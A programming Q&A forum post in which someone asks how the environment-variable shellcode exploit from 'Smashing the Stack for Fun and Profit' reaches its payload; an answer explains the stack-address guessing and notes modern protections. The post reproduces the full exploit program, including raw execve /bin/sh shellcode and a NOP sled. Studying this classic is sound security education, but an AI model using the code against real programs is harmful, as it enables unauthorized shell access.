# Buffer overflow with environment variables

Tags: c, overflow, stack-overflow

I am having trouble understanding one of the exploits from **Smashing the Stack for Fun and Profit** shown below. In this exploit, some shellcode is stored in an environment variable called `EGG` and the address of the variable is repeated in a buffer which is stored in `RET`. The program we hope to exploit is then called using `RET`, which is supposed to cause the program to jump to `EGG`. Can anyone explain how the jump to `EGG` is made? It looks like `RET` is filled with the address of `%esp`, not `EGG`.

```
#include <stdlib.h>

#define DEFAULT_OFFSET                    0
#define DEFAULT_BUFFER_SIZE             512
#define DEFAULT_EGG_SIZE               2048
#define NOP                            0x90

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_esp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr, *egg;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, eggsize=DEFAULT_EGG_SIZE;

  if (argc > 1) bsize   = atoi(argv[1]);
  if (argc > 2) offset  = atoi(argv[2]);
  if (argc > 3) eggsize = atoi(argv[3]);


  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }
  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_esp() - offset;
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  ptr = egg;
  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
    *(ptr++) = NOP;

  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';
  egg[eggsize - 1] = '\0';

  memcpy(egg,"EGG=",4);
  putenv(egg);
  memcpy(buff,"RET=",4);
  putenv(buff);
  system("/bin/bash");
}
```

Answer (score 2):

do you know the program is not going to work easily with modern PC's. because in modern pc's a lots of stack protection mechanisms are applied like NX, ASLR etc.
when they wrote the above program it was not the case. at that time for every process the stack was in the same memory location.

```
unsigned long get_esp(void) {
   __asm__("movl %esp,%eax");
}
```

the above code will return a lower memory address which assumed to be "the buffer for the victim code will be slightly above this address!"
So when we try victim code with different offset as argument there may be a chance to be the "return address = Shellcode address"! then the shellcode starts to execute! you would spawn a shell!

And EGG is just a name for your environment variable. putenv() needs a string in the form of "name=string". when you execute victim process you are placing the $EGG in the stack, that's why RET is filled with %esp. Hope you got the idea.